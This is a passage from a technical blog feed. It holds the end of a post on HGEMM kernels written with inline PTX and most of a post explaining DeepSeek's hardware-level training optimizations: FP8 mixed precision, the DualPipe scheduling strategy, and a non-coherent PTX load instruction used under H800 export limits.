<span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> bk = <span class="hljs-number">0</span>; bk &lt; K / BK; bk++) {
    <span class="hljs-comment">// Load a 64×BK tile of A into shared memory (each thread 4 elements)</span>
    <span class="hljs-keyword">if</span> (load_a_gmem_m &lt; M &amp;&amp; load_a_smem_k &lt; K) {
        <span class="hljs-comment">// e.g., s_a[load_a_smem_k][load_a_smem_m + (bk*BK)] = A[load_a_gmem_addr];</span>
    }
    <span class="hljs-comment">// Similarly load B tile into s_b...</span>
    __syncthreads(); 
    <span class="hljs-comment">// Compute 3×2 grid of WMMA multiplies</span>
    <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">3</span>; i++) {
        load_matrix_sync(frag_a, s_a[i], SA_STRIDE);
        load_matrix_sync(frag_b, s_b, SB_STRIDE);
        mma_sync(frag_c[i][<span class="hljs-number">0</span>], frag_a, frag_b, frag_c[i][<span class="hljs-number">0</span>]);
        mma_sync(frag_c[i][<span class="hljs-number">1</span>], frag_a, frag_b, frag_c[i][<span class="hljs-number">1</span>]);
    }
    __syncthreads();
    <span class="hljs-comment">// (swap buffers for double buffering, etc.)</span>
}
</code></pre>
<p>Warptiling is beneficial because it aligns with the GPU's warp scheduling unit, improving utilization of the warp schedulers. It also addresses shared memory bank conflicts by organizing memory accesses along warp boundaries, improves register cache locality (especially on recent GPU architectures), and maps better onto warp-level matrix operations in future tensor core instructions.</p>
<p>The warptiling implementation makes explicit all levels of parallelism:</p>
<ul>
<li><p>Blocktiling: Different blocks can execute in parallel on different SMs</p>
</li>
<li><p>Warptiling: Different warps can execute in parallel on different warp schedulers</p>
</li>
<li><p>Threadtiling: Instructions can execute in parallel via instruction-level parallelism</p>
</li>
</ul>
<p>To understand the exact benefits of our PTX optimizations, let's examine the assembly code for our key kernels. When profiling the naive implementation, we find that most executed instructions are memory loads:</p>
<pre><code class="lang-c">ld.shared.f32 %f91, [%r8+<span class="hljs-number">3456</span>];
ld.shared.f32 %f92, [%r7+<span class="hljs-number">108</span>];
fma.rn.f32 %f93, %f92, %f91, %f90;
</code></pre>
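<p>In our optimized kernels, the shared memory reads show up at the SASS level as a mix of 32b and vectorized 128b loads (the <code>cp.async.ca.shared.global</code> copies themselves are emitted as separate <code>LDGSTS</code> instructions on Ampere):</p>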
<pre><code class="lang-c">LDS R26, [R35.X4+<span class="hljs-number">0x800</span>] <span class="hljs-comment">// a 32b load from As</span>
LDS<span class="hljs-number">.128</span> R8, [R2]        <span class="hljs-comment">// a 128b load from Bs</span>
LDS<span class="hljs-number">.128</span> R12, [R2+<span class="hljs-number">0x20</span>]
LDS R24, [R35.X4+<span class="hljs-number">0x900</span>]
</code></pre>
<p>The vectorized shared memory access pattern is a key advantage of using PTX inline assembly, as it allows the compiler to generate more efficient SASS code. Similarly, our global memory access optimizations result in <code>LDG.E.128</code> instructions that fully utilize memory bandwidth.</p>
<h1 id="heading-conclusions">Conclusions</h1>
<p>This is more of a basic overview of some low-level optimizations made using inline PTX. But using PTX doesn’t necessarily mean that your code will automatically be supercharged. The modern NVCC compiler is so advanced that the code it generates will likely perform on par with handwritten PTX, unless you’re really good at writing it. The HGEMM implementation above didn’t even really surpass cuBLAS in any way, but it was a good thought exercise.</p>
]]></content:encoded></item><item><title><![CDATA[Deepseek's Low Level Hardware Magic]]></title><description><![CDATA[Cover Illustration by onigiriice

There has been alot of copium about Deepseek-R1 leapfrogging ChatGPT-o1 in benchmarks, with many accusing Deepseek either lying about their capabilities or sanction-busting US export controls. Moreover, the whole pan...]]></description><link>https://research.meekolab.com/deepseeks-low-level-hardware-magic</link><guid isPermaLink="true">https://research.meekolab.com/deepseeks-low-level-hardware-magic</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Wed, 05 Feb 2025 16:36:22 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1738776004390/048b8403-9055-4d86-bd91-828b49379142.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by</em></strong> onigiriice</p>
</blockquote>
<p>There has been a lot of copium about Deepseek-R1 leapfrogging ChatGPT-o1 in benchmarks, with many accusing Deepseek of either lying about their capabilities or sanction-busting US export controls. Moreover, the whole panic is making people believe that NVIDIA no longer has a technical moat and we will all be running Chinese GPUs soon.</p>
<p>Picking some knowledge from my unpublished article about crafting different SGEMM implementations and also some light reading on Zhihu and CSDN (frankly I was doing Chinese mode before it was cool), I wanna quickly compile the ways that Deepseek manages to carve efficiency gains out of last-gen NVIDIA hardware. This will mainly focus on hardware optimizations, not architectural efficiencies in the model.</p>
<h1 id="heading-american-hardware-restrictions">American Hardware Restrictions</h1>
<p>A lot has been said about American export restrictions on AI chips, but what do they actually restrict? When people talk about export restrictions, they are most likely referring to Export Control Classification Number (ECCN) 3A090, introduced by the US Bureau of Industry and Security (BIS) in its October 2022 export control rules. This rule specifically restricts the export of datacenter chips that meet specific performance thresholds and features to Chinese and Russian entities. To skip over the government techno-babble, ECCN 3A090 boils down to a few restrictions:</p>
<ul>
<li><p><strong>Total Processing Performance (TPP)</strong></p>
<p>  The primary metric for controlling AI chips is defined as TPP = 2 × MacTOPS × bit_length_operation, where MacTOPS is the theoretical peak number of tera (10^12) multiply-accumulate operations per second and bit length refers to the numerical precision of the operation in bits (e.g., 16 for FP16, 32 for FP32).</p>
</li>
<li><p><strong>Performance Density</strong></p>
<p>  Performance density is calculated as TPP divided by die area in square millimeters. This metric prevents circumvention through die size manipulation and accounts for miniaturization and efficiency improvements.</p>
</li>
<li><p><strong>Memory Bandwidth</strong></p>
<p>  Memory bandwidth controls specifically target implementations using High Bandwidth Memory (HBM) and similar advanced memory architectures. These restrictions focus on memory bandwidth density thresholds, which are particularly relevant for AI accelerators utilizing stacked memory configurations. This category recognizes that memory bandwidth is often a key performance bottleneck in AI computation.</p>
</li>
<li><p><strong>Transfer Rate Controls</strong></p>
<p>  Transfer rate restrictions apply to chips with an aggregate bidirectional transfer rate of ≥600 GB/s across all inputs and outputs, excluding volatile memory. This threshold covers both actual and programmable capabilities, including interfaces like PCIe and NVLink. The controls apply regardless of whether the transfer rate is achieved through a single interface or multiple combined interfaces.</p>
</li>
</ul>
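<p>To make the first two metrics concrete, here is a minimal sketch of the arithmetic. The chip numbers in the usage note are made up for illustration and do not describe any real product, and the function names are hypothetical; only the two formulas come from the definitions above.</p>

```cpp
#include <cassert>

// TPP = 2 x MacTOPS x bit length of the operation.
inline double total_processing_performance(double mac_tops, int bit_length) {
    assert(mac_tops >= 0.0 && bit_length > 0);
    return 2.0 * mac_tops * bit_length;
}

// Performance density = TPP / die area in square millimeters.
inline double performance_density(double tpp, double die_area_mm2) {
    assert(die_area_mm2 > 0.0);
    return tpp / die_area_mm2;
}
```

<p>A hypothetical accelerator doing 100 MacTOPS at 16-bit precision would score a TPP of 3200, and on an 800 mm² die that works out to a performance density of 4.0. Note that halving the precision at the same MacTOPS halves the TPP, which is why the rating is taken at whichever precision gives the highest value.</p>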
<p>So Deepseek not only needs to work through limitations in chip processing power, but also feature-set limitations that are specifically designed to prevent the aggregation of chips by limiting inter-chip bandwidth and networking capabilities.</p>
<p>There is a lot of speculation (and even misinformation) about how Deepseek actually managed to squeeze performance out of the NVIDIA chips it still has, but a lot of the information is actually laid out in the <a target="_blank" href="https://arxiv.org/pdf/2412.19437">technical report for Deepseek-V3</a>, which is the base model for Deepseek-R1.</p>
<h1 id="heading-mixed-precision-training">Mixed Precision Training</h1>
<p>Mixed precision training has been a popular way for Chinese LLM developers to work with chip restrictions. A notable implementation is with the Tencent Hunyuan-Large model, which utilized mixed precision training with <a target="_blank" href="https://huggingface.co/tencent/Tencent-Hunyuan-Large/blob/main/Hunyuan-A52B-Pretrain/config.json#L46">the bfloat16 format</a> which was introduced by <a target="_blank" href="https://cloud.google.com/blog/products/ai-machine-learning/bfloat16-the-secret-to-high-performance-on-cloud-tpus">Google Brain in 2019</a>. bfloat16 (BF16) represents a 16-bit variant of the conventional IEEE 754 single-precision floating-point format (FP32).</p>
<p>While maintaining the dynamic range of FP32, BF16 features a truncated significand compared to FP16, enabling both memory efficiency and accelerated computation. Benchmarks have shown that mixed precision training can achieve up to <a target="_blank" href="https://pytorch.org/blog/accelerating-training-on-nvidia-gpus-with-pytorch-automatic-mixed-precision/">2.5x acceleration</a> compared to full-precision training using FP32 on high-performance GPU architectures such as the NVIDIA A100. But the key advancement in DeepSeek-V3 is making FP8 mixed-precision training work for large-scale models, which has been notoriously unstable.</p>
<p>Their implementation is a fine-grained quantization strategy that works at both tile and block levels to extend the dynamic range of the FP8 format. For activations, they implement tile-wise grouping with 1 × Nc elements, while for weights they use block-wise grouping with Nc × Nc elements. This granular approach to quantization helps mitigate the impact of outliers by adapting the scale according to smaller groups of elements, rather than using a global scaling factor.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1738580859286/4e8dbf55-df99-4b68-8f63-1cf935cb4394.png" alt class="image--center mx-auto" /></p>
<p>The framework maintains most compute-dense operations in FP8, particularly the General Matrix Multiplication (GEMM) operations. These GEMM operations accept FP8 tensors as inputs and produce outputs in either BF16 or FP32 format. All three GEMMs associated with the Linear operator - forward pass (Fprop), activation backward pass (Dgrad), and weight backward pass (Wgrad) - are executed in FP8. This design theoretically doubles the computational speed compared to the original BF16 method.</p>
<p>DeepSeek recognizes that certain operators require higher precision due to their sensitivity to low-precision computations. They maintain the original precision (BF16 or FP32) for several components: the embedding module, the output head, MoE gating modules, normalization operators, and attention operators. This targeted retention of high precision ensures stable training dynamics.</p>
<p>To address the limited accumulation precision of FP8 GEMM on NVIDIA H800 GPUs (around 14 bits), DeepSeek implements a promotion to CUDA cores for higher precision. During Matrix Multiply-Accumulate (MMA) execution on Tensor Cores, intermediate results are accumulated using the limited bit width. Once an interval of Nc is reached, these partial results are copied to FP32 registers on CUDA cores, where full-precision FP32 accumulation is performed. Setting Nc = 128 elements, equivalent to 4 Warpgroup-level Matrix Multiply-Accumulates (WGMMAs), represents the minimal accumulation interval that significantly improves precision without substantial overhead.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1738580161482/096ae0fb-12ca-4b09-8351-1aba2b3911b1.png" alt class="image--center mx-auto" /></p>
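<p>To get a feel for why the promotion interval matters, here is a minimal sketch in plain Python. It is a toy model, not how Tensor Cores actually behave: <code>round_to_bits</code> and <code>accumulate</code> are hypothetical helpers that simply round the running sum to a 14-bit significand after every addition, and a Python float stands in for the FP32 register on the CUDA cores.</p>

```python
import math


def round_to_bits(x: float, bits: int) -> float:
    """Round x to `bits` bits of significand (toy model of a narrow accumulator)."""
    mantissa, exponent = math.frexp(x)  # x == mantissa * 2**exponent
    scale = 2 ** bits
    return math.ldexp(round(mantissa * scale) / scale, exponent)


def accumulate(products, bits: int = 14, interval: int = 128) -> float:
    """Sum `products` in a narrow accumulator, promoting every `interval` terms."""
    total = 0.0    # stands in for the FP32 register on CUDA cores
    partial = 0.0  # stands in for the limited-precision accumulator
    for i, p in enumerate(products, start=1):
        partial = round_to_bits(partial + p, bits)
        if i % interval == 0:
            total += partial  # promotion: flush the partial sum at full precision
            partial = 0.0
    return total + partial


# One large term followed by many small ones, K = 4096 terms in total.
products = [1.0] + [2.0 ** -20] * 4095
exact = math.fsum(products)
no_promotion = accumulate(products, interval=len(products))
promoted = accumulate(products, interval=128)
print("error without promotion:", exact - no_promotion)
print("error with promotion:   ", exact - promoted)
```

<p>In this toy setup the narrow accumulator swallows every small term once the large one is in it, so without promotion all 4095 small contributions are lost. With a flush every 128 terms, only the first chunk suffers. Real hardware rounding is more subtle, but the shape of the problem is the same.</p>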
<p>In contrast to hybrid FP8 formats used in <a target="_blank" href="https://arxiv.org/pdf/2209.05433">Micikevicius et al. (2022</a>) (which use E4M3 in Fprop and E5M2 in Dgrad and Wgrad), DeepSeek adopts the E4M3 format universally. This is made possible by their fine-grained quantization strategy - by operating on smaller element groups, their methodology effectively shares exponent bits among grouped elements, mitigating the impact of limited dynamic range.</p>
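<p>The range trade-off between the two formats can be worked out from their bit layouts. The sketch below is my own illustration (the helper <code>fp8_limits</code> is hypothetical), assuming the encodings described in the FP8 paper linked above: E5M2 follows IEEE conventions, while E4M3 reserves only a single mantissa pattern in the top exponent field for NaN.</p>

```python
def fp8_limits(exp_bits: int, man_bits: int, bias: int, ieee_like: bool):
    """Return (largest finite value, smallest positive subnormal) for an FP8 layout."""
    max_exp_field = 2 ** exp_bits - 1
    if ieee_like:
        # The top exponent field is reserved for inf/NaN, so the largest normal
        # number uses the field below it with an all-ones mantissa.
        largest = 2.0 ** (max_exp_field - 1 - bias) * (2 - 2.0 ** -man_bits)
    else:
        # E4M3 keeps the top exponent field for normal numbers and reserves
        # only the all-ones mantissa there for NaN.
        largest = 2.0 ** (max_exp_field - bias) * (2 - 2.0 ** (1 - man_bits))
    smallest_subnormal = 2.0 ** (1 - bias - man_bits)
    return largest, smallest_subnormal


e4m3 = fp8_limits(exp_bits=4, man_bits=3, bias=7, ieee_like=False)
e5m2 = fp8_limits(exp_bits=5, man_bits=2, bias=15, ieee_like=True)
print("E4M3:", e4m3)
print("E5M2:", e5m2)
```

<p>E4M3 tops out at 448, which is where the <code>448.</code> constant in DeepSeek's quantization kernel comes from, while E5M2 reaches 57344 at the cost of one mantissa bit. Per-group scaling is what lets the narrower range of E4M3 go further.</p>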
<p>For calculating scale factors, DeepSeek employs online quantization rather than delayed quantization frameworks that maintain historical maximum absolute values. They calculate the maximum absolute value online for each 1x128 activation tile or 128x128 weight block, derive the scaling factor, and quantize to FP8 format immediately.</p>
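<pre><code class="lang-python"><span class="hljs-comment"># Imports needed to run this excerpt</span>
<span class="hljs-keyword">from</span> typing <span class="hljs-keyword">import</span> Tuple

<span class="hljs-keyword">import</span> torch
<span class="hljs-keyword">import</span> triton
<span class="hljs-keyword">import</span> triton.language <span class="hljs-keyword">as</span> tl


<span class="hljs-meta">@triton.jit</span>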
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">act_quant_kernel</span>(<span class="hljs-params">x_ptr, y_ptr, s_ptr, BLOCK_SIZE: tl.constexpr</span>):</span>
    <span class="hljs-string">"""
    Quantizes the input tensor `x_ptr` and stores the result in `y_ptr` and the scaling factor in `s_ptr`.

    Args:
        x_ptr (triton.Pointer): Pointer to the input tensor.
        y_ptr (triton.Pointer): Pointer to the output tensor where quantized values will be stored.
        s_ptr (triton.Pointer): Pointer to the output tensor where scaling factors will be stored.
        BLOCK_SIZE (tl.constexpr): The size of the block to be processed by each program instance.

    Returns:
        None
    """</span>
    pid = tl.program_id(axis=<span class="hljs-number">0</span>)
    offs = pid * BLOCK_SIZE + tl.arange(<span class="hljs-number">0</span>, BLOCK_SIZE)
    x = tl.load(x_ptr + offs).to(tl.float32)
    s = tl.max(tl.abs(x)) / <span class="hljs-number">448.</span>
    y = x / s
    y = y.to(y_ptr.dtype.element_ty)
    tl.store(y_ptr + offs, y)
    tl.store(s_ptr + pid, s)


<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">act_quant</span>(<span class="hljs-params">x: torch.Tensor, block_size: int = <span class="hljs-number">128</span></span>) -&gt; Tuple[torch.Tensor, torch.Tensor]:</span>
    <span class="hljs-string">"""
    Quantizes the input tensor `x` using block-wise quantization.

    Args:
        x (torch.Tensor): The input tensor to be quantized. Must be contiguous and its last dimension size must be divisible by `block_size`.
        block_size (int, optional): The size of the blocks to be used for quantization. Default is 128.

    Returns:
        Tuple[torch.Tensor, torch.Tensor]: A tuple containing:
            - The quantized tensor with dtype `torch.float8_e4m3fn`.
            - A tensor of scaling factors with dtype `torch.float32`.
    """</span>
    <span class="hljs-keyword">assert</span> x.is_contiguous(), <span class="hljs-string">'Input tensor must be contiguous'</span>
    <span class="hljs-keyword">assert</span> x.size(<span class="hljs-number">-1</span>) % block_size == <span class="hljs-number">0</span>, <span class="hljs-string">f'Last dimension size must be divisible by block_size (block_size=<span class="hljs-subst">{block_size}</span>)'</span>
    y = torch.empty_like(x, dtype=torch.float8_e4m3fn)
    s = x.new_empty(*x.size()[:<span class="hljs-number">-1</span>], x.size(<span class="hljs-number">-1</span>) // block_size, dtype=torch.float32)
    grid = <span class="hljs-keyword">lambda</span> meta: (triton.cdiv(x.numel(), meta[<span class="hljs-string">'BLOCK_SIZE'</span>]), )
    act_quant_kernel[grid](x, y, s, BLOCK_SIZE=block_size)
    <span class="hljs-keyword">return</span> y, s
</code></pre>
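<p>The kernel above computes one scale per 128-element tile. As a rough illustration of why that helps with outliers, here is a plain-Python sketch (no Triton or GPU needed) that compares per-tile scales with a single global scale. The helper <code>tile_scales</code> and the sample values are made up for the example.</p>

```python
FP8_E4M3_MAX = 448.0


def tile_scales(row, tile=128):
    """One scale per 1 x `tile` group: max |x| in the group divided by the FP8 maximum."""
    assert len(row) % tile == 0, "row length must be divisible by the tile size"
    return [
        max(abs(v) for v in row[i:i + tile]) / FP8_E4M3_MAX
        for i in range(0, len(row), tile)
    ]


row = [0.5] * 256
row[200] = 896.0  # a single outlier in the second tile

per_tile = tile_scales(row)                        # one scale per 128 elements
global_scale = tile_scales(row, tile=len(row))[0]  # one scale for the whole row

# Scaled value of an ordinary element from the first tile under both schemes.
scaled_per_tile = row[0] / per_tile[0]
scaled_global = row[0] / global_scale
print(per_tile, global_scale, scaled_per_tile, scaled_global)
```

<p>With per-tile scaling, the outlier only inflates the scale of its own tile, so the first tile still maps onto the full FP8 range. With a global scale, every ordinary value is squeezed down to 0.25 before the cast.</p>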
<p>For optimizer states, they adopt BF16 instead of FP32 to track first and second moments in the AdamW optimizer. However, master weights and gradients are retained in FP32 to ensure numerical stability throughout training. Similarly, for activation caching during backward passes, inputs of the Linear after the attention operator use a custom E5M6 data format, while inputs of the SwiGLU operator in MoE are stored in FP8 with their fine-grained quantization method.</p>
<p>For communication in MoE operations, activations are quantized to FP8 before MoE up-projections, compatible with FP8 Fprop in MoE up-projections. A similar strategy applies to activation gradients before MoE down-projections. Forward and backward combine components are maintained in BF16 to preserve training precision in critical parts of the pipeline.</p>
<h1 id="heading-bidirectional-pipeline-scheduling">Bidirectional Pipeline Scheduling</h1>
<p>Bidirectional pipeline parallelism can be traced back to the 2021 paper "<a target="_blank" href="https://arxiv.org/pdf/2107.06925">Chimera: Efficiently Training Large-Scale Neural Networks with Bidirectional Pipelines</a>" by Torsten Hoefler and Shigang Li from ETH Zurich. The bidirectional pipeline with cross-arrangement can reduce the bubble rate but doubles the memory usage for weights.</p>
<p>Despite the efficiency gains, major parallel computing libraries like Megatron, DeepSpeed, and Colossal-AI haven't implemented it. They mostly stick to the simpler 1F1B (one forward, one backward) approach. Moreover, it was later superseded by other PP improvements. In 2021-2022, few organizations were training models at such large scales.</p>
<p>Doubling model weights in memory was impractical when attention training wasn't bottlenecked by sequence length. Unlike today's common 8k+ token pretraining, activation memory was a smaller concern then. With limited GPU resources, increasing batch size for better throughput was preferable to doubling memory usage.</p>
<p>But unlike other pipeline parallel approaches, DualPipe employs a bidirectional pipeline scheduling strategy that feeds micro-batches simultaneously from both ends of the pipeline. This approach significantly reduces pipeline bubbles - periods where hardware goes unused. The algorithm divides each chunk into four primary components: attention, all-to-all dispatch, MLP, and all-to-all combine. For backward chunks, both attention and MLP are further split into two parts: backward for input and backward for weights. The boundaries of transformer blocks in these chunks are intentionally misaligned to enable optimal overlapping.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737906261702/7a25b8bd-f782-4b29-a9e2-02ef1a448c4b.jpeg" alt class="image--center mx-auto" /></p>
<p>The pipeline bubbles in DualPipe are mathematically expressed as:</p>
<p>$$\left(\frac{PP}{2} - 1\right)(F\&amp;B + B - 3W)$$</p><p>where PP represents pipeline parallel size, F&amp;B denotes the execution time of two mutually overlapped forward and backward chunks, B represents the execution time of a full backward chunk, and W denotes the execution time of a "backward for weights" chunk.</p>
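<p>To make the formula concrete, here is a small sketch that plugs in numbers. The timings are hypothetical, and the 1F1B and ZB1P expressions are quoted from memory of the comparison table in the DeepSeek-V3 report, so treat them as assumptions rather than something verified here.</p>

```python
def bubble_1f1b(pp, f, b):
    """Bubble time for 1F1B (assumed form): (PP - 1)(F + B)."""
    return (pp - 1) * (f + b)


def bubble_zb1p(pp, f, b, w):
    """Bubble time for ZB1P (assumed form): (PP - 1)(F + B - 2W)."""
    return (pp - 1) * (f + b - 2 * w)


def bubble_dualpipe(pp, f_and_b, b, w):
    """Bubble time for DualPipe: (PP/2 - 1)(F&B + B - 3W)."""
    assert pp % 2 == 0, "DualPipe needs an even number of pipeline stages"
    return (pp / 2 - 1) * (f_and_b + b - 3 * w)


# Hypothetical timings in arbitrary units: a forward chunk takes 1, a full
# backward chunk takes 2 (half of it for weights), and an overlapped
# forward-and-backward pair is pessimistically taken as F + B = 3.
PP, F, B, W, F_AND_B = 8, 1.0, 2.0, 1.0, 3.0

results = {
    "1F1B": bubble_1f1b(PP, F, B),
    "ZB1P": bubble_zb1p(PP, F, B, W),
    "DualPipe": bubble_dualpipe(PP, F_AND_B, B, W),
}
print(results)
```

<p>Even with no benefit assumed from overlapping F&amp;B, the halved <code>PP/2 - 1</code> factor keeps DualPipe's bubble at or below the others for these inputs.</p>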
<p>The schedule below shows an example with 8 pipeline ranks and 20 micro-batches fed in two directions. The micro-batches in the reverse direction are symmetric to those in the forward direction, and cells that share a black border have mutually overlapped computation and communication.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737913271894/c2669bfa-bc1d-4c2b-b49a-32b8ada67044.jpeg" alt class="image--center mx-auto" /></p>
<p>In terms of memory, DualPipe keeps two copies of the model parameters and holds PP + 1 micro-batches of activations at peak, compared to a single copy and PP for 1F1B. The extra parameter copy is a small overhead when a large expert parallel (EP) size is used. Unlike <a target="_blank" href="https://arxiv.org/pdf/2107.06925">Chimera</a>, DualPipe only requires the number of pipeline stages and micro-batches to be divisible by 2, rather than requiring micro-batches to be divisible by pipeline stages.</p>
<p>The scheduling mechanism ensures that communication operations (dispatch and combine) for one micro-batch overlap with computation operations (attention and MLP) of another. This overlap extends to both all-to-all communication for expert parallelism and pipeline parallel communication. By maintaining computation-communication overlap at scale, DualPipe enables DeepSeek to employ fine-grained experts across nodes while effectively eliminating all-to-all communication overhead.</p>
<p>In the paper, DeepSeek notes:</p>
<blockquote>
<p>Although DualPipe requires keeping two copies of the model parameters, this does not significantly increase the memory consumption since we use a large EP size during training. Compared with Chimera (Li and Hoefler, 2021), DualPipe only requires that the pipeline stages and micro-batches be divisible by 2, without requiring micro-batches to be divisible by pipeline stages. In addition, for DualPipe, neither the bubbles nor activation memory will increase as the number of micro-batches grows</p>
</blockquote>
<p>DeepSeek's DualPipe innovates by combining Zero Bubble Pipeline Parallelism, which splits backward passes into separate input gradient and weight gradient computations, with Chimera's approach of using two parallel streams of computation. This combination allows more efficient scheduling: while one stream is doing forward computations, the other can simultaneously perform backward computations.</p>
<p>The real breakthrough comes with how this dual-stream approach handles the all-to-all communication needed for Mixture-of-Experts (MoE) models. When using just a single stream, all-to-all communication for forward and backward passes must happen sequentially. But with dual streams, DualPipe can perform forward pass communication in one stream at the same time as backward pass communication in the other stream. This overlapping of communication dramatically improves efficiency, as the GPU isn't left waiting for one communication phase to finish before starting another.</p>
<h1 id="heading-the-magic-ptx-instruction">The Magic PTX Instruction</h1>
<p>During DeepSeek’s recent open source week, it released its implementation of the inter-GPU communication kernels tailored for MoE training and inference. In the <a target="_blank" href="https://arxiv.org/pdf/2412.19437">paper</a>, DeepSeek mentions:</p>
<blockquote>
<p>Specifically, we employ customized PTX (Parallel Thread Execution) instructions and auto-tune the communication chunk size, which significantly reduces the use of the L2 cache and the interference to other SMs.</p>
</blockquote>
<p>And it seems that DeepSeek finally revealed the “customized PTX instruction” mentioned in the DeepSeek-V3 paper, saying that it’s an “out-of-doc” instruction.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1740636571112/6c800eb2-bc11-4329-8267-18c4b0e54f0f.png" alt class="image--center mx-auto" /></p>
<p>But a later edit to the README corrected this, elaborating that it’s a “behavior-out-of-doc” instruction and not an undocumented one.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1740636631467/650bcaec-73af-4d13-acdd-37d79dce243d.png" alt class="image--center mx-auto" /></p>
<p>This was later again edited to provide more clarity.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1740636794981/be99d507-d4af-4e1e-bb10-9cc76b97eedb.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1740636644921/ed0abb20-7f55-4f0f-8490-94ce3b0e1f40.png" alt class="image--center mx-auto" /></p>
<p>But what is PTX? For those familiar with LLVM, PTX shares similarities with LLVM’s Intermediate Representation (IR). While LLVM’s project scope has expanded beyond its original “virtual machine” naming, its core concept of IR remains analogous to PTX. IR acts as a bridge between frontend programming languages and backend machine code, simplifying support for new languages and hardware targets while enabling cross-platform optimizations. PTX serves as NVIDIA’s "CUDA IR," connecting high-level CUDA C++ code with low-level GPU SASS instructions. This abstraction allows NVIDIA to implement runtime optimizations via tools like NVRTC and generate device-agnostic code.</p>
<p>Though CUDA developers may not directly interact with PTX, it plays a critical role under the hood. When compiling CUDA code with NVCC, <code>.ptx</code> files are generated during the device code compilation phase. These files represent the optimized intermediate code before final translation to SASS (the GPU’s native instruction set).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1738579948361/a4f6e1f0-f6b6-4ecf-a5ff-e9bef1e0ae4d.png" alt class="image--center mx-auto" /></p>
<p>Many people touted DeepSeek’s use of PTX as game-changing, but using PTX doesn’t necessarily mean that your code will automatically be supercharged. The modern NVCC compiler is so advanced that the code it generates will likely perform on par with handwritten PTX, unless you’re really good at writing it.</p>
<p>MoE models have unique communication patterns because they dynamically route tokens to different experts that may be distributed across multiple GPUs and nodes. This creates an intense all-to-all communication pattern that can become a performance bottleneck. This is further complicated by sanctions, where the interconnect speeds are severely nerfed in H800 cards.</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td><strong>Specs</strong></td><td><strong>H100 SXM5</strong></td><td><strong>H800 SXM5</strong></td></tr>
</thead>
<tbody>
<tr>
<td>Double precision FP64</td><td>34 TFLOPS</td><td>1 TFLOPS</td></tr>
<tr>
<td>Double precision FP64 (Tensor Core)</td><td>67 TFLOPS</td><td>1 TFLOPS</td></tr>
<tr>
<td>Single precision FP32</td><td>67 TFLOPS</td><td>67 TFLOPS</td></tr>
<tr>
<td>Memory Bandwidth</td><td>3.35TB/s</td><td>3.35TB/s</td></tr>
<tr>
<td>Interconnect Bandwidth</td><td>900 GB/s</td><td>400 GB/s</td></tr>
<tr>
<td>NVLink links</td><td>18</td><td>8</td></tr>
</tbody>
</table>
</div><p>The <code>__ldg</code> intrinsic in CUDA <a target="_blank" href="https://forums.developer.nvidia.com/t/maxwell-sm-50-instruction-ldg-e/39123/4">maps to the PTX instruction</a> <code>ld.global.nc</code>, which loads data through the non-coherent texture cache path. This was originally introduced in the Kepler architecture to provide a higher bandwidth, <a target="_blank" href="https://forums.developer.nvidia.com/t/do-7-x-devices-have-a-readonly-constant-cache/220844">read-only path for accessing global memory</a>:</p>
<pre><code class="lang-c"><span class="hljs-comment">// Standard usage of __ldg</span>
<span class="hljs-keyword">template</span> &lt;<span class="hljs-keyword">typename</span> T&gt;
<span class="hljs-function">__device__ __forceinline__ T <span class="hljs-title">read_with_ldg</span><span class="hljs-params">(<span class="hljs-keyword">const</span> T* ptr)</span> </span>{
    <span class="hljs-keyword">return</span> __ldg(ptr);
}

<span class="hljs-comment">// Compiled to something like:</span>
<span class="hljs-comment">// ld.global.nc.f32 %f1, [%rd1];</span>
</code></pre>
<p>The texture cache has historically been optimized for spatially local access patterns and offers higher bandwidth than the standard L1/L2 cache path. However, it comes with a crucial limitation: by design, it is non-coherent with global memory stores. The NVIDIA programming guide explicitly warns that the texture cache isn't kept coherent with respect to global memory writes within the same kernel execution.</p>
<p>The kernel code in <code>internode.cu</code> shows that DeepSeek needs to efficiently move data between GPUs in the form of hidden states and routing information.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// From the combine_token function, they need to read data sent by other GPUs</span>
<span class="hljs-keyword">auto</span> recv_fn = [&amp;](<span class="hljs-keyword">int</span> src_rdma_rank, <span class="hljs-keyword">int</span> slot_idx, <span class="hljs-keyword">int</span> hidden_int4_idx) -&gt; int4 {
    <span class="hljs-comment">// If using __ldg, this could be:</span>
    <span class="hljs-keyword">return</span> __ldg(<span class="hljs-keyword">reinterpret_cast</span>&lt;<span class="hljs-keyword">const</span> int4*&gt;(rdma_channel_data.recv_buffer(src_rdma_rank) + 
                                                slot_idx * num_bytes_per_rdma_token) + 
                                                hidden_int4_idx);
};
</code></pre>
<p>DeepSeek's initial attempt with <code>ldg</code> was problematic for their MoE communication patterns. The data being communicated between experts on different GPUs needs to be immediately visible, but the non-coherent nature of <code>ldg</code> meant that some reads could <a target="_blank" href="https://forums.developer.nvidia.com/t/improper-use-of-ldg-causes-illegal-memory-access/36577#:~:text=When%20you%20read,kernel%E2%80%9D%20holds%20true.">return stale data</a>, leading to incorrect computation results.</p>
<p>Consider a writer thread on GPU 1 that executes <code>global_buffer[my_idx] = data</code>, writing a value (say 42) to global memory. This write goes through the normal global memory access path, and the value is eventually updated in the device's global memory.</p>
